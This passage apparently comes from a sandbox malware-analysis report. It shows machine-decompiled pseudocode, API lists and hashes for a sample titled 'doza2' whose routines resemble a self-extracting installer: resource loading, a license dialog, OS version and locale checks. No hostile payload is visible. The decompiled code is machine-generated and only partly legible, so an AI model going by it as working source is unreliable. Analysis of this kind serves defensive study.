				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xb88004; // 0xfbc33aab
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00B8171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xb89124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xb8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00B8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00B86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00b86298
0x00b862a0
0x00b862a7
0x00b862ad
0x00b862af
0x00b862bb
0x00b862c3
0x00b862c4
0x00b8633b
0x00b8633b
0x00b86345
0x00b8634d
0x00000000
0x00000000
0x00b862da
0x00b862de
0x00b8635f
0x00b86369
0x00b862e0
0x00b862e0
0x00b862e0
0x00b862e3
0x00b862e5
0x00b862e5
0x00b862e8
0x00b862e8
0x00b862ea
0x00b862eb
0x00b862ef
0x00b862f1
0x00b862f3
0x00b86302
0x00b86308
0x00b8630d
0x00b86314
0x00b86314
0x00b86316
0x00b86319
0x00b86355
0x00b86357
0x00b8631b
0x00b8631b
0x00b86331
0x00b86334
0x00b86339
0x00000000
0x00b86339
0x00b86319
0x00b8636b
0x00b8637d
0x00b8637d
0x00000000

APIs

Part of subcall function 00B8171E: _vsnprintf.MSVCRT ref: 00B81750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00B851CA,00000004,00000024,00B82F71,?,00000002,00000000), ref: 00B862CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00B851CA,00000004,00000024,00B82F71,?,00000002,00000000), ref: 00B862D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00B851CA,00000004,00000024,00B82F71,?,00000002,00000000), ref: 00B8631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00B86345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00B851CA,00000004,00000024,00B82F71,?,00000002,00000000), ref: 00B86357

Strings

UPDFILE%lu, xrefs: 00B862B3, 00B86329

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 2967a354a412a4b4eb719f65ac71ef0e2b1f9b9cd614fd72deb4b6e5ec1d3f29
Instruction ID: 5a778195af8cb630d8ff5eb0c076b36e5c202f13a851d9f790a0c4e38a5147b6
Opcode Fuzzy Hash: 2967a354a412a4b4eb719f65ac71ef0e2b1f9b9cd614fd72deb4b6e5ec1d3f29
Instruction Fuzzy Hash: 6121F675A00219ABDB10BF68DC49DBEBBBCEB44710B00019AF902A3261DB359D02CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00B8681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B8681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xb88004; // 0xfbc33aab
				_v8 = _t19 ^ _t44;
				_t41 =  *0xb881d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xb881d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xb881d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xb81140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00B866F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xb881d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00B86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x00b8681f
0x00b8682a
0x00b86831
0x00b86836
0x00b8683c
0x00b8683e
0x00b86848
0x00b86851
0x00b8685d
0x00b86864
0x00b86876
0x00b8693a
0x00b8693a
0x00b8687c
0x00b8687e
0x00b86885
0x00000000
0x00b868d6
0x00b868f4
0x00b86900
0x00b86902
0x00b8690a
0x00000000
0x00b8690c
0x00b8690c
0x00b8691c
0x00000000
0x00b8691e
0x00b86924
0x00b8692b
0x00b86932
0x00000000
0x00000000
0x00000000
0x00b8692b
0x00b8691c
0x00b8690a
0x00b86885
0x00b86876
0x00b86951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00B8686E
GetSystemMetrics.USER32(0000004A), ref: 00B868A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00B868CC
RegQueryValueExA.ADVAPI32(?,00B81140,00000000,?,?,0000000C), ref: 00B868F4
RegCloseKey.ADVAPI32(?), ref: 00B86902

Part of subcall function 00B866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00B8691A), ref: 00B86741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00B868C2

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 0becdd6b71de33900ab3c9c30c467416719edf9dd93d1bfe8c104c8fb3d1ba97
Instruction ID: 4172503a130a690f61bdb0c6f215050db4e6b39cbdd213b06ab5ac836f432e06
Opcode Fuzzy Hash: 0becdd6b71de33900ab3c9c30c467416719edf9dd93d1bfe8c104c8fb3d1ba97
Instruction Fuzzy Hash: A3316F31A01218DFDB31EB51CD45BAAB7F9EB89768F0001E5E949A71A0DF309E85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00B83A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B83A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00B8468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xb88d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00B8468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xb88d4c, "<None>") == 0) {
							LocalFree( *0xb88d4c);
							L9:
							 *0xb89124 = 0;
							return 1;
						}
						_t9 = E00B86517(_t19, 0x7d1, 0, E00B83100, 0, 0);
						LocalFree( *0xb88d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xb89124 = 0x800704c7;
						L2:
						return 0;
					}
					E00B844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xb88d4c);
					 *0xb89124 = 0x80070714;
					goto L2;
				}
				E00B844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xb89124 = E00B86285();
				goto L2;
			}

0x00b83a46
0x00b83a57
0x00b83a5d
0x00b83a63
0x00b83a6a
0x00b83a91
0x00b83a9a
0x00b83ad8
0x00b83b13
0x00b83b19
0x00b83b1b
0x00000000
0x00b83b21
0x00b83ae7
0x00b83af4
0x00b83afc
0x00000000
0x00000000
0x00b83afe
0x00b83a87
0x00000000
0x00b83a87
0x00b83aa8
0x00b83ab3
0x00b83ab9
0x00000000
0x00b83ab9
0x00b83a78
0x00b83a82
0x00000000

APIs

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00B82F64,?,00000002,00000000), ref: 00B83A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00B83AB3

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Part of subcall function 00B86285: GetLastError.KERNEL32(00B85BBC), ref: 00B86285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00B83AD0
LocalFree.KERNEL32 ref: 00B83B13

Part of subcall function 00B86517: FindResourceA.KERNEL32(00B80000,000007D6,00000005), ref: 00B8652A
Part of subcall function 00B86517: LoadResource.KERNEL32(00B80000,00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00B86538
Part of subcall function 00B86517: DialogBoxIndirectParamA.USER32(00B80000,00000000,00000547,00B819E0,00000000), ref: 00B86557
Part of subcall function 00B86517: FreeResource.KERNEL32(00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00B86560

LocalFree.KERNEL32(00000000,00B83100,00000000,00000000), ref: 00B83AF4

Strings

LICENSE, xrefs: 00B83A46
<None>, xrefs: 00B83AC5

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 98471b55b6d7c1a34bbd00e20e1f1c35155b186f976eeac6db9002383dec439c
Instruction ID: c18df7a43cbd3becc32ba5a0fc09fb975ffbc91f3bce453166e0c46a8d1972f1
Opcode Fuzzy Hash: 98471b55b6d7c1a34bbd00e20e1f1c35155b186f976eeac6db9002383dec439c
Instruction Fuzzy Hash: B911D370201202ABD724BF76AC4DE2B3AF9DBD5F00B1444BEB545EB2B0DE798801C720

Uniqueness

Uniqueness Score: -1.00%

Function 00B824E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B824E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xb88004; // 0xfbc33aab
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00B8658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00B86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00b824e0
0x00b824eb
0x00b824f2
0x00b824f7
0x00b82504
0x00b8250e
0x00b8251d
0x00b8252c
0x00b82541
0x00b82546
0x00b82553
0x00b82555
0x00b82555
0x00b82546
0x00b8256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00B82506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00B8252C
_lopen.KERNEL32(?,00000040), ref: 00B8253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00B8254C
_lclose.KERNEL32(00000000), ref: 00B82555

Strings

wininit.ini, xrefs: 00B82510

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: a3bdaece679c4d84439bde09bee2805c51c57a53fbd0c4762a61c7ffce494b0b
Instruction ID: 5bfd5e03d756de3f6e1ec50780eb7311fd287c531dd9d9fba35c3cd469e21d9a
Opcode Fuzzy Hash: a3bdaece679c4d84439bde09bee2805c51c57a53fbd0c4762a61c7ffce494b0b
Instruction Fuzzy Hash: BF01923260011867D720AF65DC08EDFBBBCDB55760F000195FA49D31A0DE748E46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B836EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B836EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xb88004; // 0xfbc33aab
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xb88184 = 1;
						 *0xb88180 = 1;
						L13:
						 *0xb89a40 = _t119;
						L14:
						__eflags =  *0xb88a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00B82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00B82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xb88a38 & 0x00000001;
											if(( *0xb88a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00B8681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00B867C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00B828E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xb89a40 = _t119;
						 *0xb88184 = 1;
						 *0xb88180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xb89a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xb88184 = _t135;
							 *0xb88180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00B844B9(0, _t138);
					L66:
					return E00B86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00b836f9
0x00b83700
0x00b8370c
0x00b83716
0x00b83718
0x00b8371b
0x00b83721
0x00b8372b
0x00b8373d
0x00b83745
0x00b83746
0x00b83746
0x00b83749
0x00b837ab
0x00b837ad
0x00b837ae
0x00b837b3
0x00b837b8
0x00b837b8
0x00b837bf
0x00b837bf
0x00b837c5
0x00000000
0x00000000
0x00b837cb
0x00b837cd
0x00000000
0x00000000
0x00b837d5
0x00b837db
0x00b837e8
0x00b837ea
0x00b837ea
0x00b837ea
0x00b837f0
0x00b837f6
0x00b83805
0x00b83817
0x00b8382b
0x00b83830
0x00b83836
0x00b8383b
0x00b8383d
0x00b838eb
0x00b838eb
0x00b838f2
0x00b8390c
0x00b83911
0x00b83911
0x00b83913
0x00b8394d
0x00b8394d
0x00b8394f
0x00b838a9
0x00b838a9
0x00b838b0
0x00b838b2
0x00b838b9
0x00b838bb
0x00b838c1
0x00b83975
0x00b838c7
0x00b838de
0x00b838e0
0x00b838e0
0x00b8397b
0x00b8397d
0x00b839a9
0x00b8397f
0x00b83982
0x00b8398b
0x00b8398d
0x00b8398f
0x00b8399f
0x00b839a1
0x00b83991
0x00b83991
0x00b83991
0x00b8398f
0x00b839af
0x00b839b6
0x00b83a0f
0x00b83a0f
0x00b83a11
0x00b83a13
0x00b83a19
0x00000000
0x00b839b8
0x00b839b8
0x00b839ba
0x00000000
0x00000000
0x00b839bc
0x00b839bf
0x00000000
0x00000000
0x00b839c3
0x00b839c9
0x00b839ce
0x00b839d0
0x00b839e3
0x00b839e5
0x00b839e6
0x00b839f1
0x00b839f7
0x00b839fa
0x00b83a01
0x00b83a04
0x00000000
0x00000000
0x00b83a06
0x00b83a09
0x00b83a09
0x00b83a0b
0x00b83a0b
0x00000000
0x00b83a09
0x00b839fc
0x00000000
0x00b839fc
0x00b839d3
0x00b839d8
0x00b839da
0x00000000
0x00000000
0x00000000
0x00b839dc
0x00b839b6
0x00b83955
0x00b8395b
0x00000000
0x00000000
0x00b83961
0x00b83963
0x00000000
0x00000000
0x00b83969
0x00b83969
0x00000000
0x00b83969
0x00b83915
0x00b83915
0x00b8391b
0x00b8391f
0x00000000
0x00000000
0x00b8392d
0x00b83933
0x00b83938
0x00b8393a
0x00000000
0x00000000
0x00b83940
0x00b83946
0x00b8394b
0x00000000
0x00b8394b
0x00000000
0x00b838f2
0x00b83843
0x00b83845
0x00000000
0x00000000
0x00b8384b
0x00b8384d
0x00b83883
0x00b83885
0x00000000
0x00000000
0x00b8389a
0x00b8389e
0x00b8389e
0x00000000
0x00000000
0x00b838a0
0x00b838a0
0x00b838a2
0x00000000
0x00000000
0x00b838a4
0x00000000
0x00b838a4
0x00b8384f
0x00b83851
0x00b83857
0x00b8386e
0x00b83877
0x00b8387b
0x00000000
0x00000000
0x00000000
0x00b83881
0x00b83859
0x00b8385c
0x00b83862
0x00b83866
0x00000000
0x00000000
0x00b83868
0x00000000
0x00b838f4
0x00b838f4
0x00b838f5
0x00b838fb
0x00b83901
0x00b83901
0x00000000
0x00b8390a
0x00b8374b
0x00b8374e
0x00b8375c
0x00b83764
0x00b83769
0x00b8376e
0x00b83771
0x00b8379c
0x00b8379f
0x00000000
0x00000000
0x00b837a3
0x00b837a4
0x00000000
0x00b837a4
0x00b83773
0x00b83777
0x00b83778
0x00b8377f
0x00b83781
0x00b8378e
0x00b8378e
0x00b83794
0x00000000
0x00b83794
0x00b83783
0x00000000
0x00000000
0x00b83785
0x00b8378c
0x00000000
0x00000000
0x00000000
0x00b8378c
0x00b83750
0x00000000
0x00b8372d
0x00b8372d
0x00b8396b
0x00b8396b
0x00b8396c
0x00b8396e
0x00b8396f
0x00b83a1e
0x00b83a1e
0x00b83a22
0x00b83a27
0x00b83a3e
0x00b83a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00B83723
MessageBeep.USER32(00000000), ref: 00B839C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 00B839F1

Strings

3, xrefs: 00B83785
doza2, xrefs: 00B839E9, 00B83A19

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: c8da76925a34983e53ddef1b2c58d8c5cf742e59c67cb7db6fa2f02763e8b97c
Instruction ID: 48703fd95787515f80cb7bcd41150fce257b89c5d14f7df323017072eb839d46
Opcode Fuzzy Hash: c8da76925a34983e53ddef1b2c58d8c5cf742e59c67cb7db6fa2f02763e8b97c
Instruction Fuzzy Hash: 2E91D171A012259BEB39BF14CC91BAA77E1EB45F04F1501E9D88AAB271DB74CF80CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B86495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xb88004; // 0xfbc33aab
				_v8 = _t9 ^ _t28;
				_push(__ecx);
